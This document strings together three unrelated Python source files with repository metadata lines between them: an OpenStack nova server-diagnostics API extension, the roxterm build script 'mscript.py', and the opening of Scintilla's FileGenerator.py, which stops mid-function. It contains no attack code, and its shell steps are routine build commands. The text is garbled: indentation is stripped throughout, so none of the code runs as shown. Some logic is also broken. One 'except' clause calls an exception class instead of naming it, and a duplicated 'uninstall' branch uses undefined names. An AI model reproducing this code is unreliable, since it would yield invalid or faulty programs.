# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob.exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
from nova import exception
authorize = extensions.extension_authorizer('compute', 'server_diagnostics')
sd_nsmap = {None: wsgi.XMLNS_V11}
class ServerDiagnosticsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('diagnostics')
elem = xmlutil.SubTemplateElement(root, xmlutil.Selector(0),
selector=xmlutil.get_items)
elem.text = 1
return xmlutil.MasterTemplate(root, 1, nsmap=sd_nsmap)
class ServerDiagnosticsController(object):
@wsgi.serializers(xml=ServerDiagnosticsTemplate)
def index(self, req, server_id):
context = req.environ["nova.context"]
authorize(context)
compute_api = compute.API()
try:
instance = compute_api.get(context, server_id)
except exception.NotFound():
raise webob.exc.HTTPNotFound(_("Instance not found"))
return compute_api.get_diagnostics(context, instance)
class Server_diagnostics(extensions.ExtensionDescriptor):
"""Allow Admins to view server diagnostics through server action"""
name = "ServerDiagnostics"
alias = "os-server-diagnostics"
namespace = ("http://docs.openstack.org/compute/ext/"
"server-diagnostics/api/v1.1")
updated = "2011-12-21T00:00:00+00:00"
def get_resources(self):
parent_def = {'member_name': 'server', 'collection_name': 'servers'}
#NOTE(bcwaldon): This should be prefixed with 'os-'
ext = extensions.ResourceExtension('diagnostics',
ServerDiagnosticsController(),
parent=parent_def)
return [ext]
| apache-2.0 |
forivall/tacoterm | mscript.py | 3 | 29478 | #!/usr/bin/env python
import errno, os, re, sys, time
from maitch import *
ctx = Context(PACKAGE = "roxterm", SRC_DIR = "${TOP_DIR}/src",
MCFLAGS = "${CPPFLAGS} -I. -I${SRC_DIR} -D_GNU_SOURCE -DHAVE_CONFIG_H")
MINILIB_SOURCES = "colourscheme.c dlg.c display.c dragrcv.c dynopts.c " \
"encodings.c globalopts.c logo.c options.c optsfile.c rtdbus.c"
ROXTERM_CONFIG_SOURCES = "capplet.c colourgui.c configlet.c getname.c " \
"optsdbus.c profilegui.c shortcuts.c"
ROXTERM_SOURCES = "about.c main.c multitab.c multitab-close-button.c " \
"multitab-label.c menutree.c optsdbus.c roxterm.c search.c " \
"shortcuts.c uri.c x11support.c"
ROXTERM_HTML_BASENAMES = "guide index installation news".split()
LOGO_PNG = "${TOP_DIR}/Help/lib/roxterm_logo.png"
FAVICON = "${TOP_DIR}/Help/lib/favicon.ico"
TEXT_LOGO = "${TOP_DIR}/Help/lib/logo_text.png"
APPINFO = "${TOP_DIR}/AppInfo.xml"
VFILE = "${TOP_DIR}/version"
if ctx.mode == 'configure' or ctx.mode == 'help':
ctx.arg_disable('gtk-native-tab-dragging',
"Use ROXTerm's legacy code for dragging tabs "
"instead of GTK+'s functions")
ctx.arg_with('gnome-default-applications',
"Where to install GNOME Default Applications file",
default = None)
ctx.arg_disable('sm', "Don't enable session management")
ctx.arg_disable('nls', "Disable all translations",
default = None)
ctx.arg_disable('translations',
"Disable all translations (same as --disable-nls)", default = None)
ctx.arg_disable('git', "Assume this is a release tarball: "
"don't attempt to generate changelogs, pixmaps etc")
ctx.arg_enable("rox-locales",
"Make symlinks so ROX app can load translations")
if ctx.mode == 'configure':
ctx.find_prog_env("sed")
try:
ctx.find_prog_env("gpg")
except MaitchNotFoundError:
mprint("gpg not found, not signing tarball")
ctx.setenv('SIGN_DIST', False)
else:
ctx.setenv('SIGN_DIST', True)
vfile = ctx.subst(VFILE)
if ctx.env['ENABLE_GIT'] != False:
git = os.path.exists(ctx.subst(opj("${TOP_DIR}", ".git")))
try:
ctx.find_prog_env("git")
except MaitchNotFoundError:
git = False
else:
git = False
if git:
# Might have an obsolete version.h from earlier build
ctx.delete("${SRC_DIR}/version.h")
version = ctx.prog_output(["${GIT}", "describe",
"--match", "[0-9]*"])[0].strip()
version = version.replace('-', '.', 1).replace('-', '~', 1)
ctx.save_if_different(vfile, version + '\n')
gitlog = ctx.prog_output(["/bin/sh", os.path.abspath(
ctx.subst("${TOP_DIR}/genlog"))])[0].lstrip()
# Can't use ctx.save_if_different because it tries to subst
# content and fails
save_if_different(ctx.subst("${TOP_DIR}/ChangeLog"), gitlog)
else:
fp = open(vfile, 'r')
version = fp.read().strip()
fp.close()
ctx.setenv('VERSION', version)
try:
ctx.find_prog_env("xsltproc", "XMLTOMAN")
except MaitchNotFoundError:
mprint("Unable to build manpages without xsltproc", file = sys.stderr)
ctx.setenv("XMLTOMAN", "")
else:
ctx.setenv("XMLTOMAN_OPTS", "-o ${TGT} --nonet --novalid " \
"--param man.charmap.use.subset 0 " \
"http://docbook.sourceforge.net/release/xsl/" \
"current/manpages/docbook.xsl")
ctx.setenv("XMLTOMAN_OUTPUT", "")
if ctx.env['ENABLE_GIT'] != False:
try:
ctx.find_prog_env("convert")
ctx.find_prog_env("composite")
try:
ctx.find_prog_env("rsvg-convert")
except:
ctx.find_prog_env("rsvg")
except:
mprint("WARNING: ImageMagick and/or rsvg binaries appear " \
"not to be installed.\n" \
"This will cause errors later unless the generated " \
"pixmaps are already present,\neg supplied with a " \
"release tarball.",
file = sys.stderr)
ctx.setenv("CONVERT", "")
ctx.setenv("COMPOSITE", "")
else:
ctx.setenv("CONVERT", "")
ctx.setenv("COMPOSITE", "")
ctx.setenv('BUG_TRACKER', "http://sourceforge.net/tracker/?group_id=124080")
trans = ctx.env['ENABLE_TRANSLATIONS'] and ctx.env['ENABLE_NLS']
if trans != False:
try:
ctx.find_prog_env("xgettext")
ctx.find_prog_env("msgcat")
ctx.find_prog_env("msgmerge")
ctx.find_prog_env("msgfmt")
except MaitchNotFoundError:
if trans == True:
raise
else:
mprint("WARNING: Translation tools not found, not building " \
" programs' translations", file = sys.stderr)
ctx.setenv('HAVE_GETTEXT', False)
else:
ctx.setenv('HAVE_GETTEXT', True)
else:
ctx.setenv('HAVE_GETTEXT', False)
if trans != False:
try:
ctx.find_prog_env("po4a-gettextize")
ctx.find_prog_env("po4a-updatepo")
ctx.find_prog_env("po4a-translate")
except MaitchNotFoundError:
if trans == True:
raise
else:
mprint("WARNING: po4a tools not found, not building " \
"documentation's translations", file = sys.stderr)
ctx.setenv('HAVE_PO4A', False)
else:
ctx.setenv('HAVE_PO4A', True)
ctx.setenv('PO4ACHARSET', "-M UTF-8")
ctx.setenv('PO4AOPTS', "${PO4ACHARSET} --package-name=${PACKAGE} " \
"--package-version=${VERSION} " \
"--copyright-holder='Tony Houghton' " \
"--msgid-bugs-address=${BUG_TRACKER}")
ctx.setenv('PO4ADIR', "${ABS_TOP_DIR}/po4a")
ctx.setenv('PO4ABUILDDIR', "${ABS_BUILD_DIR}/po4a")
else:
ctx.setenv('HAVE_PO4A', False)
if trans != False and ctx.env['HAVE_GETTEXT']:
try:
ctx.find_prog_env("itstool")
except MaitchNotFoundError:
if trans == True:
raise
else:
mprint("WARNING: itstool not found, not building " \
"AppData file's translations", file = sys.stderr)
ctx.setenv('HAVE_ITSTOOL', False)
else:
ctx.setenv('HAVE_ITSTOOL', True)
ctx.setenv('POXML_DIR', "${ABS_TOP_DIR}/poxml")
ctx.setenv('POXML_BUILD_DIR', "${ABS_BUILD_DIR}/poxml")
ctx.setenv('APPDATA_ITS', "${POXML_DIR}/appdata.its")
else:
ctx.setenv('HAVE_ITSTOOL', False)
gda = ctx.env.get("WITH_GNOME_DEFAULT_APPLICATIONS")
if gda == None or gda == True:
try:
gda = ctx.prog_output("${PKG_CONFIG} "
"--variable=defappsdir gnome-default-applications")
except MaitchChildError:
if gda == True:
raise
else:
gda = ""
elif gda == False:
gda = ""
ctx.setenv("WITH_GNOME_DEFAULT_APPLICATIONS", gda)
ctx.pkg_config('gtk+-3.0', 'GTK', '3.10')
ctx.pkg_config('vte-2.91', 'VTE')
vte_version = ctx.prog_output("${PKG_CONFIG} --modversion vte-2.91")
ctx.setenv('NEED_TRANSPARENCY_FIX', vte_version >= "0.34.8")
sm = ctx.env['ENABLE_SM']
if sm != False:
try:
ctx.pkg_config('sm ice', 'SM')
except MaitchChildError:
if sm == True:
raise
sm = False
else:
sm = True
ctx.define('ENABLE_SM', sm)
ctx.pkg_config('dbus-1', 'DBUS', '1.0')
ctx.pkg_config('dbus-glib-1', 'DBUS', '0.22')
ctx.pkg_config('gmodule-export-2.0', 'GMODULE')
ctx.pkg_config('x11')
for f in ["get_current_dir_name"]:
ctx.check_func(f, "${CFLAGS} ${MCFLAGS} ${LIBS}")
#for f in "get_current_dir_name g_mkdir_with_parents " \
# "gdk_window_get_display gdk_window_get_screen " \
# "gtk_widget_get_realized gtk_widget_get_mapped " \
# "gtk_combo_box_text_new gtk_rc_style_unref " \
# "gtk_drag_begin_with_coordinates".split():
# ctx.check_func(f, "${CFLAGS} ${MCFLAGS} ${GTK_CFLAGS}",
# "${LIBS} ${GTK_LIBS}")
for f in ["vte_terminal_set_word_chars",
"vte_terminal_set_background_tint_color"]:
ctx.check_func(f, "${CFLAGS} ${MCFLAGS} ${VTE_CFLAGS}",
"${LIBS} ${VTE_LIBS}")
ctx.setenv('CORE_CFLAGS',
"${CFLAGS} ${MCFLAGS} ${GTK_CFLAGS} ${DBUS_CFLAGS}")
ctx.setenv('CORE_LIBS',
"${LIBS} ${GTK_LIBS} ${DBUS_LIBS}")
ctx.setenv('ROXTERM_CFLAGS',
"${CFLAGS} ${MCFLAGS} ${VTE_CFLAGS} ${SM_CFLAGS} ${DBUS_CFLAGS}")
ctx.setenv('ROXTERM_LIBS',
"${LIBS} ${VTE_LIBS} ${SM_LIBS} ${DBUS_LIBS} ${X11_LIBS}")
ctx.setenv('ROXTERM_CONFIG_CFLAGS',
"${CFLAGS} ${MCFLAGS} ${GTK_CFLAGS} ${DBUS_CFLAGS} " \
"${GMODULE_CFLAGS} -DROXTERM_CAPPLET")
ctx.setenv('ROXTERM_CONFIG_LIBS',
"${LIBS} ${GTK_LIBS} ${DBUS_LIBS} ${GMODULE_LIBS}")
ctx.define_from_var('PACKAGE')
ctx.define('DO_OWN_TAB_DRAGGING',
ctx.env.get('ENABLE_GTK_NATIVE_TAB_DRAGGING', True))
ctx.define('SYS_CONF_DIR', ctx.env['SYSCONFDIR'])
ctx.define('DATA_DIR', ctx.env['DATADIR'])
ctx.define('PKG_DATA_DIR', opj(ctx.env['DATADIR'], "roxterm"))
ctx.define('ICON_DIR',
opj(ctx.env['DATADIR'], "icons", "hicolor", "scalable", "apps"))
ctx.define('HTML_DIR', ctx.env['HTMLDIR'])
ctx.setenv('htmldir', "${HTMLDIR}")
ctx.define('BIN_DIR', ctx.env['BINDIR'])
if ctx.env['HAVE_GETTEXT']:
ctx.define('ENABLE_NLS', 1)
else:
ctx.define('ENABLE_NLS', None)
ctx.define_from_var('LOCALEDIR')
ctx.define_from_var('NEED_TRANSPARENCY_FIX')
ctx.subst_file("${TOP_DIR}/roxterm.1.xml.in",
"${BUILD_DIR}/roxterm.1.xml", True)
ctx.subst_file("${TOP_DIR}/roxterm-config.1.xml.in",
"${BUILD_DIR}/roxterm-config.1.xml", True)
ctx.subst_file("${TOP_DIR}/roxterm.spec.in", "${BUILD_DIR}/roxterm.spec")
ctx.subst_file("${TOP_DIR}/.ycm_extra_conf.py.in",
"${TOP_DIR}/.ycm_extra_conf.py", True)
ctx.setenv('APPINFO_STRING', "${VERSION} (%s)" % \
time.strftime("%Y-%m-%d", time.gmtime(time.time())))
if not os.path.exists(ctx.subst(APPINFO)):
ctx.subst_file(APPINFO + ".in", APPINFO)
ctx.save_if_different("version.h",
'/* Auto-generated by mscript.py */\n' \
'#ifndef VERSION_H\n' \
'#define VERSION_H\n' \
'#define VERSION "${VERSION}"\n' \
'#endif\n')
ctx.created_by_config['version.h'] = True
# Make symlinks expected by ROX
for f in "AUTHORS ChangeLog COPYING COPYING-LGPL NEWS README".split():
if f == "ChangeLog":
dest = "${TOP_DIR}/Help/Changes"
else:
dest = "${TOP_DIR}/Help/" + f
src = "../" + f
if subprocess.call(["ln", "-nfs", src, ctx.subst(dest)]):
raise MaitchChildError("Failed to link '%s' Help file" % f)
elif ctx.mode == 'build':
# Private library
for c in MINILIB_SOURCES.split():
ctx.add_rule(StaticLibCRule(
sources = c,
cflags = "${CORE_CFLAGS}",
prefix = "libroxterm-",
quiet = True))
ctx.add_rule(CStaticLibRule(
sources = change_suffix_with_prefix(MINILIB_SOURCES,
".c", ".lo", "libroxterm-"),
targets = "libroxterm.la",
cflags = "${CORE_CFLAGS}",
libs = "${CORE_LIBS}",
quiet = True))
# roxterm
if bool(ctx.env['ENABLE_SM']):
ROXTERM_SOURCES += " session.c"
for c in ROXTERM_SOURCES.split():
ctx.add_rule(LibtoolCRule(
sources = c,
cflags = "${ROXTERM_CFLAGS}",
prefix = "roxterm-",
wdeps = "version.h"))
ctx.add_rule(LibtoolCProgramRule(
sources = change_suffix_with_prefix(ROXTERM_SOURCES,
".c", ".lo", "roxterm-"),
targets = "roxterm",
cflags = "${ROXTERM_CFLAGS}",
libs = "${ROXTERM_LIBS} -lroxterm",
deps = "libroxterm.la",
quiet = True))
# roxterm-config
for c in ROXTERM_CONFIG_SOURCES.split():
ctx.add_rule(LibtoolCRule(
sources = c,
cflags = "${ROXTERM_CONFIG_CFLAGS}",
prefix = "roxterm-config-"))
ctx.add_rule(LibtoolCProgramRule(
sources = change_suffix_with_prefix(ROXTERM_CONFIG_SOURCES,
".c", ".lo", "roxterm-config-"),
targets = "roxterm-config",
cflags = "${ROXTERM_CONFIG_CFLAGS}",
libs = "${ROXTERM_CONFIG_LIBS} -lroxterm",
deps = "libroxterm.la",
quiet = True))
# Stuff other than the program
# Graphics
if ctx.env['CONVERT']:
ctx.add_rule(Rule(rule = "${CONVERT} -background #0000 " \
"${SRC} -geometry 64x64 ${TGT}",
targets = LOGO_PNG,
sources = "roxterm.svg",
where = TOP))
# Note 'where' is NOWHERE for following two rules because sources
# already start with ${TOP_DIR}.
ctx.add_rule(Rule(rule = "${CONVERT} ${SRC} -geometry 16x16 ${TGT}",
targets = FAVICON,
sources = LOGO_PNG,
where = NOWHERE))
ctx.add_rule(Rule( \
rule = "${COMPOSITE} -gravity SouthWest ${SRC} ${TGT}",
targets = TEXT_LOGO,
sources = [LOGO_PNG, "${TOP_DIR}/Help/lib/logo_text_only.png"],
where = NOWHERE))
# man pages
if ctx.env['XMLTOMAN']:
xmltomanrule = "${XMLTOMAN} ${XMLTOMAN_OPTS} ${SRC} ${XMLTOMAN_OUTPUT}"
# Something is causing a thread to hang between calling xsltproc
# and exiting from subprocess.Popen. Could it be trying to run two
# at once? Making one wdep on the other should stop jobs overlapping.
ctx.add_rule(Rule(
rule = xmltomanrule,
targets = "roxterm.1",
sources = "roxterm.1.xml",
where = TOP))
ctx.add_rule(Rule(
rule = xmltomanrule,
targets = "roxterm-config.1",
sources = "roxterm-config.1.xml",
wdeps = "roxterm.1",
where = TOP))
#ctx.add_rule(SuffixRule(
# rule = xmltomanrule,
# targets = ".1",
# sources = ".1.xml",
# where = TOP))
# Force invocation of above suffix rule
#ctx.add_rule(TouchRule(
# targets = "manpages",
# sources = "roxterm.1 roxterm-config.1"))
# Translations (gettext)
if ctx.env['HAVE_GETTEXT']:
podir = '${ABS_BUILD_DIR}/po'
ctx.add_rule(Rule(rule = mkdir_rule, targets = podir))
args = { 'copyright_holder': "(c) 2013 Tony Houghton",
'version': "${VERSION}",
'bugs_addr': "${BUG_TRACKER}",
'use_shell': True,
'dir': podir }
code_pot = '${ABS_BUILD_DIR}/po/code.pot'
glade_pot = '${ABS_BUILD_DIR}/po/glade.pot'
trans_rules = PoRulesFromLinguas(ctx, **args) + \
PotRules(ctx,
targets = code_pot,
deps = podir,
xgettext_opts = '-C -k_ -kN_',
**args)
for r in trans_rules:
ctx.add_rule(r)
ctx.add_rule(PotRule(ctx,
sources = '../src/roxterm-config.ui',
targets = glade_pot,
deps = podir,
xgettext_opts = '-L Glade',
dir = "${ABS_TOP_DIR}/po"))
ctx.add_rule(Rule(sources = [code_pot, glade_pot],
targets = '${ABS_TOP_DIR}/po/${PACKAGE}.pot',
rule = '${MSGCAT} -o ${TGT} ${SRC}',
diffpat = gettext_diffpat))
# Symlinks so ROX can use translations
if ctx.env["ENABLE_ROX_LOCALES"]:
def add_rox_locale(ctx, l, f):
d = opj("locale", l, "LC_MESSAGES")
ctx.add_rule(Rule(rule = mkdir_rule, targets = d))
ctx.add_rule(Rule(rule = "ln -nfs ../../po/%s.mo ${TGT}" % l,
targets = opj(d, "roxterm.mo"),
wdeps = [d, opj("po", "%s.mo" % l)]))
foreach_lingua(ctx, add_rox_locale)
ctx.add_rule(Rule(rule = "ln -nfs pt_BR ${TGT}",
targets = opj("locale", "pt"),
wdeps = opj("locale", "pt_BR", "LC_MESSAGES")))
# Translations (po4a)
if ctx.env['HAVE_PO4A']:
linguas = parse_linguas(ctx, podir = "${PO4ADIR}")
charset_rule = "${SED} -i s/charset=CHARSET/charset=UTF-8/ ${TGT}"
ctx.ensure_out_dir("po4a")
if ctx.env['XMLTOMAN']:
# Workaround for deadlock (?)
lastmtarget = None
for m in ["roxterm", "roxterm-config"]:
ctx.add_rule(Rule(rule = ["${PO4A_GETTEXTIZE} ${PO4AOPTS} " \
"-f docbook -m ${SRC} -p ${TGT}",
charset_rule],
sources = "../%s.1.xml.in" % m,
targets = "%s.1.pot" % m,
where = NOWHERE,
diffpat = gettext_diffpat,
dir = "${PO4ADIR}",
use_shell = True))
for l in linguas:
po = "${PO4ADIR}/%s.1.%s.po" % (m, l)
ctx.add_rule(Rule(rule = ["${PO4A_UPDATEPO} ${PO4AOPTS} " \
"-f docbook -m ${SRC} -p ${TGT}",
charset_rule,
"rm -f ${TGT}~"],
sources = ["../%s.1.xml.in" % m, "%s.1.pot" % m],
targets = po,
diffpat = gettext_diffpat,
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
ctx.add_rule(Rule(rule = "${PO4A_TRANSLATE} "
"${PO4ACHARSET} " \
"-k 0 -f docbook -m ../%s.1.xml.in " \
"-p ${SRC} -l ${TGT}" % m,
sources = po,
targets = "${ABS_BUILD_DIR}/po4a/%s.1.%s.xml.in" % \
(m, l),
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
ctx.add_rule(Rule(rule = "${SED} " \
"'s/@VERSION@/${VERSION}/; " \
"s#@htmldir@#${HTMLDIR}#' <${SRC} >${TGT}",
sources = "${PO4ABUILDDIR}/%s.1.%s.xml.in" % (m, l),
targets = "${PO4ABUILDDIR}/%s.1.%s.xml" % (m, l),
deps = po,
where = NOWHERE,
use_shell = True))
mtarget = "${PO4ABUILDDIR}/%s/%s.1" % (l, m)
ctx.add_rule(Rule( \
rule = [mk_parent_dir_rule, xmltomanrule],
sources = "${PO4ABUILDDIR}/%s.1.%s.xml" % (m, l),
targets = mtarget,
wdeps = lastmtarget,
where = NOWHERE))
lastmtarget = mtarget
for h in ROXTERM_HTML_BASENAMES:
master = "../Help/en/%s.html" % h
pot = "%s.html.pot" % h
ctx.add_rule(Rule(rule = ["${PO4A_GETTEXTIZE} ${PO4AOPTS} " \
"-f xhtml -m ${SRC} -p ${TGT}",
charset_rule,
"${SED} -i 's/SOME DESCRIPTIVE TITLE/" \
"Translations for roxterm docs/' ${TGT}",
"${SED} -i 's/Copyright (C) YEAR/" + \
"Copyright (C) 2010-2014/' " \
"${TGT}",
"${SED} -i 's/FIRST AUTHOR <EMAIL@ADDRESS>, YEAR/"
"Tony Houghton <[email protected]>, 2014/' ${TGT}"],
sources = master,
targets = "${PO4ADIR}/" + pot,
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
for l in linguas:
ldir = "../Help/%s" % l
ctx.ensure_out_dir(ldir)
po = "${PO4ADIR}/%s.html.%s.po" % (h, l)
ctx.add_rule(Rule(rule = ["${PO4A_UPDATEPO} ${PO4AOPTS} " \
"-f xhtml -m ${SRC} -p ${TGT}",
charset_rule],
sources = [master, pot],
targets = po,
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
ctx.add_rule(Rule(rule = [mk_parent_dir_rule,
"${PO4A_TRANSLATE} "
"${PO4ACHARSET} " \
"-k 0 -f xhtml -m %s " \
"-p ${SRC} -l ${TGT}" % master],
sources = po,
targets = "${ABS_TOP_DIR}/Help/%s/%s.html" % (ldir, h),
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
# Translations (itstool)
if ctx.env['HAVE_ITSTOOL']:
podir = "${POXML_DIR}"
linguas = parse_linguas(ctx, podir = podir)
basename = "roxterm.appdata.xml"
xmlout = "${ABS_BUILD_DIR}/" + basename
xmlin = "../" + basename + ".in"
potfile = "${POXML_DIR}/roxterm.appdata.xml.pot"
ctx.add_rule(Rule( \
rule = ["${ITSTOOL} -i ${APPDATA_ITS} -o ${TGT} ${SRC}",
"${SED} -i 's/Project-Id-Version: PACKAGE VERSION/" \
"Project-Id-Version: roxterm ${VERSION}/' " \
"${TGT}"],
sources = xmlin,
targets = potfile,
deps = "${APPDATA_ITS}",
where = NOWHERE,
dir = podir,
use_shell = True))
if linguas:
for r in PoRulesFromLinguas(ctx, podir = podir,
modir = "${POXML_BUILD_DIR}",
sources = potfile):
ctx.add_rule(r)
sources = []
for l in parse_linguas(ctx, podir = podir):
sources.append(opj("${POXML_BUILD_DIR}", l + ".mo"))
ctx.add_rule(Rule( \
rule = "${ITSTOOL} -i ${APPDATA_ITS} -j " + xmlin +
" -o ${TGT} ${SRC}",
sources = sources,
targets = xmlout,
dir = podir,
where = NOWHERE))
else:
linguas = None
if not linguas:
ctx.add_rule(Rule(rule = "cp ${SRC} ${TGT}",
sources = "${ABS_TOP_DIR}/roxterm.appdata.xml.in",
targets = "${ABS_BUILD_DIR}/roxterm.appdata.xml",
where = NOWHERE))
elif ctx.mode == "install" or ctx.mode == "uninstall":
ctx.install_bin("roxterm roxterm-config")
ctx.install_data("roxterm-config.ui")
ctx.install_data("roxterm.desktop", "${DATADIR}/applications")
ctx.install_data("roxterm.appdata.xml", "${DATADIR}/appdata")
if ctx.env['XMLTOMAN']:
ctx.install_man("roxterm.1 roxterm-config.1")
ctx.install_doc("AUTHORS ChangeLog README")
ctx.install_doc(ctx.glob("*.html",
subdir = ctx.subst("${TOP_DIR}/Help/en")),
"${HTMLDIR}/en")
ctx.install_doc(ctx.glob("*.png",
subdir = ctx.subst("${TOP_DIR}/Help/lib")),
"${HTMLDIR}/lib")
ctx.install_doc(ctx.glob("*.css",
subdir = ctx.subst("${TOP_DIR}/Help/lib")),
"${HTMLDIR}/lib")
ctx.install_data("roxterm.svg", "${DATADIR}/icons/hicolor/scalable/apps")
ctx.install_data(["Config/Colours/Tango", "Config/Colours/GTK"],
"${PKGDATADIR}/Config/Colours")
ctx.install_data("Config/Shortcuts/Default",
"${PKGDATADIR}/Config/Shortcuts")
gda = ctx.env['WITH_GNOME_DEFAULT_APPLICATIONS']
if gda:
ctx.install_data("roxterm.xml", gda)
linguas = parse_linguas(ctx)
if ctx.env['HAVE_GETTEXT']:
for l in linguas:
ctx.install_data("po/%s.mo" % l,
"${LOCALEDIR}/%s/LC_MESSAGES/roxterm.mo" % l,
other_options = "-T")
ptdir = ctx.subst("${DESTDIR}/${LOCALEDIR}/pt/LC_MESSAGES")
ctx.ensure_out_dir(ptdir)
call_subprocess(["ln", "-sfn",
"../../pt_BR/LC_MESSAGES/roxterm.mo", ptdir])
if ctx.env['HAVE_PO4A']:
for l in linguas:
if ctx.env['XMLTOMAN']:
ctx.install_man("po4a/%s/roxterm.1 po4a/%s/roxterm-config.1" % \
(l, l), opj("${MANDIR}", l))
ctx.install_doc( \
ctx.glob("*.html",
subdir = ctx.subst("${TOP_DIR}/Help/%s" % l)),
"${HTMLDIR}/%s" % l)
ptdir = ctx.subst("${DESTDIR}/${MANDIR}/pt/man1")
ctx.ensure_out_dir(ptdir)
call_subprocess(["ln", "-sfn", "../../pt_BR/man1/roxterm.1", ptdir])
call_subprocess(["ln", "-sfn", "../../pt_BR/man1/roxterm-config.1",
ptdir])
call_subprocess(["ln", "-sfn", "pt_BR",
ctx.subst("${DESTDIR}/${HTMLDIR}/pt")])
elif ctx.mode == 'pristine' or ctx.mode == 'clean':
clean = ["${TOP_DIR}/maitch.pyc"] + \
["${TOP_DIR}/.ycm_extra_conf.py",
"${TOP_DIR}/.ycm_extra_conf.pyc"] + \
ctx.glob("*.po~", "${TOP_DIR}", "po") + \
ctx.glob("*.po~", "${TOP_DIR}", "po4a") + \
ctx.glob("*.po~", "${TOP_DIR}", "poxml")
if ctx.mode == 'pristine':
clean += [APPINFO, VFILE, "${TOP_DIR}/ChangeLog"] + \
["${TOP_DIR}/Help/" + f for f in \
"AUTHORS COPYING COPYING-LGPL Changes NEWS README".split()] + \
["${TOP_DIR}/Help/lib/" + f for f in \
"favicon.ico logo_text.png roxterm_logo.png".split()] + \
ctx.glob("*.pot", "${TOP_DIR}", "po") + \
ctx.glob("*.pot", "${TOP_DIR}", "po4a") + \
ctx.glob("*.pot", "${TOP_DIR}", "poxml")
for f in clean:
ctx.delete(f)
# Generated HTML doesn't go in tarball so must be cleaned
f = open(ctx.subst("${TOP_DIR}/po4a/LINGUAS"), 'r')
hd = ctx.subst("${TOP_DIR}/Help/")
for d in [hd + l.strip() for l in f.readlines() + ['pt']]:
recursively_remove(d, False, [])
f.close()
elif ctx.mode == 'dist':
ctx.subst_file(APPINFO + ".in", APPINFO)
ctx.add_dist("AUTHORS Help/AUTHORS " \
"genlog ChangeLog ChangeLog.old Config " \
"COPYING COPYING-LGPL Help/en Help/lib/header.png " \
"Help/lib/logo_text_only.png " \
"Help/lib/roxterm.css Help/lib/roxterm_ie.css "
"Help/lib/sprites.png " \
"INSTALL INSTALL.Debian " \
"NEWS README README.translations " \
"roxterm.1.xml.in roxterm-config.1.xml.in " \
"roxterm.appdata.xml.in " \
"roxterm.desktop roxterm.lsm.in roxterm.spec.in " \
"roxterm.svg roxterm.xml TODO " \
"src/roxterm-config.glade src/roxterm-config.ui " \
".ycm_extra_conf.py.in")
ctx.add_dist([f.replace("${TOP_DIR}/", "") \
for f in [LOGO_PNG, FAVICON, TEXT_LOGO]])
ctx.add_dist(ctx.glob("*.[c|h]", os.curdir, "src"))
# maitch-specific
ctx.add_dist("version maitch.py mscript.py")
# ROX bits
ctx.add_dist("AppInfo.xml.in AppRun .DirIcon " \
"Help/Changes Help/COPYING Help/COPYING-LGPL Help/NEWS Help/README")
if os.path.exists("AppInfo.xml"):
ctx.add_dist("AppInfo.xml")
# Translations
for f in ("po/LINGUAS", "po4a/LINGUAS", "poxml/LINGUAS",
"po/POTFILES.in", "po/roxterm.pot",
"poxml/appdata.its", "poxml/roxterm.appdata.xml.pot"):
if os.path.exists(f):
ctx.add_dist(f)
files = ctx.glob("*.po", os.curdir, "po") + \
ctx.glob("*.po", os.curdir, "po4a") + \
ctx.glob("*.pot", os.curdir, "po4a") + \
ctx.glob("*.po", os.curdir, "poxml")
if files:
ctx.add_dist(files)
ctx.run()
if ctx.mode == 'uninstall':
ctx.prune_directory("${DATADIR}/icons")
ctx.prune_directory("${PKGDATADIR}")
ctx.prune_directory("${DOCDIR}")
ctx.prune_directory("${HTMLDIR}")
elif ctx.mode == 'uninstall':
basedir = self.subst("${PACKAGE}-${VERSION}")
filename = os.path.abspath(
self.subst("${BUILD_DIR}/%s.%s" % (basedir, suffix)))
mprint("Creating %s '%s'" % (zname, filename))
| gpl-2.0 |
kondrak/bgfx | 3rdparty/scintilla/scripts/FileGenerator.py | 74 | 6509 | #!/usr/bin/env python
# FileGenerator.py - implemented 2013 by Neil Hodgson [email protected]
# Released to the public domain.
# Generate or regenerate source files based on comments in those files.
# May be modified in-place or a template may be generated into a complete file.
# Requires Python 2.5 or later
# The files are copied to a string apart from sections between a
# ++Autogenerated comment and a --Autogenerated comment which is
# generated by the CopyWithInsertion function. After the whole string is
# instantiated, it is compared with the target file and if different the file
# is rewritten.
from __future__ import with_statement
import codecs, os, re, string, sys
lineEnd = "\r\n" if sys.platform == "win32" else "\n"
def UpdateFile(filename, updated):
""" If the file contents are different to updated then copy updated into the
file else leave alone so Mercurial and make don't treat it as modified. """
newOrChanged = "Changed"
try:
with codecs.open(filename, "r", "utf-8") as infile:
original = infile.read()
if updated == original:
# Same as before so don't write
return
os.unlink(filename)
except IOError: # File is not there yet
newOrChanged = "New"
with codecs.open(filename, "w", "utf-8") as outfile:
outfile.write(updated)
print("%s %s" % (newOrChanged, filename))
# Automatically generated sections contain start and end comments,
# a definition line and the results.
# The results are replaced by regenerating based on the definition line.
# The definition line is a comment prefix followed by "**".
# If there is a digit after the ** then this indicates which list to use
# and the digit and next character are not part of the definition
# Backslash is used as an escape within the definition line.
# The part between \( and \) is repeated for each item in the list.
# \* is replaced by each list item. \t, and \n are tab and newline.
# If there is no definition line than the first list is copied verbatim.
# If retainDefs then the comments controlling generation are copied.
def CopyWithInsertion(input, commentPrefix, retainDefs, lists):
copying = 1
generated = False
listid = 0
output = []
for line in input.splitlines(0):
isStartGenerated = line.lstrip().startswith(commentPrefix + "++Autogenerated")
if copying and not isStartGenerated:
output.append(line)
if isStartGenerated:
if retainDefs:
output.append(line)
copying = 0
generated = False
elif not copying and not generated:
# Generating
if line.startswith(commentPrefix + "**"):
# Pattern to transform input data
if retainDefs:
output.append(line)
definition = line[len(commentPrefix + "**"):]
if (commentPrefix == "<!--") and (" -->" in definition):
definition = definition.replace(" -->", "")
listid = 0
